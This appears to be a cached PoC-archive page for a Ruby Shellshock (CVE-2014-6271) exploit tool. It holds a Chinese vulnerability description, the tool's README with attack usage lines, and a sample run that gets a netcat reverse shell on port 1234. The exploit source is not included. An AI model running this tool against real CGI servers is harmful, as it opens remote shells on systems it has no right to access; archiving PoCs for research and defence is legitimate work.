Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2014-6271 PoC — GNU Bash 远程代码执行漏洞

Source
https://github.com/RainMak3r/Rainstorm
Associated Vulnerability
Title:GNU Bash 远程代码执行漏洞 (CVE-2014-6271)
Description:GNU Bash是美国软件开发者布莱恩-福克斯(Brian J. Fox)为GNU计划而编写的一个Shell(命令语言解释器),它运行于类Unix操作系统中(Linux系统的默认Shell),并能够从标准输入设备或文件中读取、执行命令,同时也结合了一部分ksh和csh的特点。 GNU Bash 4.3及之前版本中存在安全漏洞,该漏洞源于程序没有正确处理环境变量值内的函数定义。远程攻击者可借助特制的环境变量利用该漏洞执行任意代码。以下产品和模块可能会被利用:OpenSSH sshd中的ForceComman
Description
CVE-2014-6271 RCE tool
Readme
================================================================================================

BadBash is a CVE-2014-6271 RCE exploit tool. The basic version only checks for the HTTP CGI site and only provides netcat reverse shell on port 1234.


Developer : Andy Yang
Version : 0.1.0
License : GPLv3

================================================================================================
RainMak3r@Could:~/Desktop# ruby BadBash.rb  -h

BadBash - CVE-2014-6271 RCE tool by Andy Yang
Basic version only checks for HTTP site
Basic version only provides netcat reverse shell on port 1234


EXAMPLE USAGE:

     ./BBash.rb  -t 'www.target.com/cgi-folder/cgi.sh' -d '127.0.0.1'
     ./BBash.rb  -t '10.0.0.1/cgi-folder/cgi.sh' -d '127.0.0.1'
    -t, --Target CGI path            Full path of CGI page
    -d, --Destination IP             Your IP address that listen to an inbound connection
    -h, --help                       Display help

================================================================================================
Example of usage.
================================================================================================
RainMak3r@Could:~/Desktop#ruby BadBash.rb -t '172.16.235.140/cgi-bin/Andy.sh' -d '172.16.189.1'

[Info]     Checking if the target is vulnerable........

[Info]     This may take up to 10 seconds........

[Info]     Target is vulnerable!!!

[Info]     Please use NC to listen on port 1234 for reverse shell..........

[Info]     Exploiting for a reverse shell to connect 172.16.189.1:1234 via netcat ..........
File Snapshot

 [4.0K]  /data/pocs/69a2ad2ee22a7990590c951fd574b1db7645c821
├── [3.8K]  BadBash.rb
├── [ 31K]  LICENSE.md
└── [1.5K]  README.md

0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.